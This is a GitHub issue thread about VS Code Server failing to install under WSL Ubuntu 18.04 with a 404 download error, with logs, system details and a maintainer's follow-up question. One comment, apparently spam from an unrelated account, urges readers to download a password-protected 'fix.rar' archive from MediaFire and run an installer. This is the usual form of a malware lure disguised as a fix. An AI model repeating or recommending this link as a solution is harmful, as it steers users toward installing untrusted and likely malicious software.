### ISSUE TITLE
failed update

### ISSUE THREAD

**Issue by ropel** [microsoft/vscode#226636]
Type: <b>Bug</b>

typing "code ." from wsl ubuntu 18.04 ...

Updating VS Code Server to version 0ee08df0cf4527e40edc9aa28f4b5bd38bbff2b2
Removing previous installation...
Installing VS Code Server for Linux legacy-x64 (0ee08df0cf4527e40edc9aa28f4b5bd38bbff2b2)
Downloading: 100%
Failed
--2024-08-26 18:07:50--  https://update.code.visualstudio.com/commit:0ee08df0cf4527e40edc9aa28f4b5bd38bbff2b2/server-linux-legacy-x64/stable
Resolving update.code.visualstudio.com (update.code.visualstudio.com)... 13.107.246.60, 2620:1ec:bdf::60
Connecting to update.code.visualstudio.com (update.code.visualstudio.com)|13.107.246.60|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-08-26 18:07:50 ERROR 404: Not Found.

ERROR: Failed to download https://update.code.visualstudio.com/commit:0ee08df0cf4527e40edc9aa28f4b5bd38bbff2b2/server-linux-legacy-x64/stable to /home/ropel/.vscode-server/bin/0ee08df0cf4527e40edc9aa28f4b5bd38bbff2b2-1724688470.tar.gz

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Windows_NT x64 10.0.26100
Modes:
Connection to 'WSL: Ubuntu-18.04' could not be established  WebSocket close with status code 1006

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|AMD Ryzen 9 6900HX with Radeon Graphics         (16 x 3294)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: enabled_on<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|undefined|
|Memory (System)|29.74GB (9.56GB free)|
|Process Argv|. --crash-reporter-id b925265a-bb58-4caf-8510-2d26bdbfb054|
|Screen Reader|no|
|VM|0%|

Connection to 'WSL: Ubuntu-18.04' could not be established  WebSocket close with status code 1006
</details>Extensions: none<details>
<summary>A/B Experiments</summary>

```
vsliv368:30146709
vspor879:30202332
vspor708:30202333
vspor363:30204092
vswsl492:30256859
vscod805cf:30301675
binariesv615:30325510
vsaa593cf:30376535
py29gd2263:31024239
vscaac:30438847
c4g48928:30535728
azure-dev_surveyone:30548225
962ge761:30959799
pythongtdpath:30769146
welcomedialogc:30910334
pythonnoceb:30805159
asynctok:30898717
pythonregdiag2:30936856
pythonmypyd1:30879173
h48ei257:31000450
pythontbext0:30879054
accentitlementst:30995554
dsvsc016:30899300
dsvsc017:30899301
dsvsc018:30899302
cppperfnew:31000557
dsvsc020:30976470
pythonait:31006305
dsvsc021:30996838
bdiig495:31013172
pythoncenvpt:31062603
a69g1124:31058053
dvdeprecation:31068756
dwnewjupyter:31046869
impr_priority:31102340
refactort:31108082
pythonrstrctxt:31112756
flightc:31119335
wkspc-onlycs-t:31111718
pme_test_c:31118331
ei213698:31121563

```

</details>

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rzhao271** [comment]
Hi @ropel, I noticed the issue is a 404 error. Are you still seeing the issue to this day? If so, does first updating VS Code (not on WSL) to 1.96 or newer help?
